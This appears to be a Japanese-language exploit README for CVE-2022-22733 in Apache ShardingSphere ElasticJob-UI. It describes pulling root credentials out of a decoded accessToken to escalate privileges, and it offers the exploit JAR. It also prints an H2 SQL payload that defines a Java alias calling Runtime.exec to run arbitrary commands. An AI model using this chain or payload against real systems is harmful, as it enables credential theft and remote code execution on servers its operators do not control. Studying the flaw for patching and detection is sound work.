
Apache ShardingSphere ElasticJob-UI 権限昇格 & RCE エクスプロイト
CVE-2022-22733 は、Apache ShardingSphere ElasticJob-UI 3.0.0 以前のバージョンに影響を与える脆弱性であり、権限昇格 (Privilege Escalation) を引き起こします。しかし、昇格した権限を悪用することで JDBC 攻撃を実行し、RCE を達成することが可能です。脆弱性の分析はこちらから、エクスプロイト作成のステップバイステップのブログはこちらから読むことができます。

エクスプロイトは以下のように動作します:
accessToken を取得します。accessToken をデコードします。accessToken からデコードされたデータを解析します。root アカウントの認証情報を取得します。root アカウントの認証情報でログインし、アプリケーションに対する完全な権限を取得します。JAR ファイルはこちらから、ソースコードはこちらからダウンロードできます。
jar を実行:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
